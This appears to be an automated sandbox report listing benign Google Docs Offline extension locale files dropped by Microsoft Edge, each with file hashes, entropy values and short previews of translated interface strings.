                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1898
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):914
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):851
Entropy (8bit):4.4858053753176526
Encrypted:false
SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:false
Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):878
Entropy (8bit):4.4541485835627475
Encrypted:false
SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
MD5:A1744B0F53CCF889955B95108367F9C8
SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
Malicious:false
Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2766
Entropy (8bit):3.839730779948262
Encrypted:false
SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
MD5:97F769F51B83D35C260D1F8CFD7990AF
SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
Malicious:false
Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):978
Entropy (8bit):4.879137540019932
Encrypted:false
SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
MD5:B8D55E4E3B9619784AECA61BA15C9C0F
SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
Malicious:false
Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):907
Entropy (8bit):4.599411354657937
Encrypted:false
SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
MD5:608551F7026E6BA8C0CF85D9AC11F8E3
SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
Malicious:false
Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):914
Entropy (8bit):4.604761241355716
Encrypted:false
SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
MD5:0963F2F3641A62A78B02825F6FA3941C
SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
Malicious:false
Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):937
Entropy (8bit):4.686555713975264
Encrypted:false
SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
MD5:BED8332AB788098D276B448EC2B33351
SHA1:6084124A2B32F386967DA980CBE79DD86742859E
SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
Malicious:false
Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1337
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2846
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):934
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                                SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):963
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1320
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):884
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                                MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                                SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                                SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                                SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):980
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                                MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                                SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                                SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                                SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wuser popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1941
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                                MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                                SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                                SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                                SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1969
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                                MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                                SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                                SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                                SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1674
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                                MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                                SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                                SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                                SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1063
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                                MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                                SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                                SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                                SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                                Malicious:false
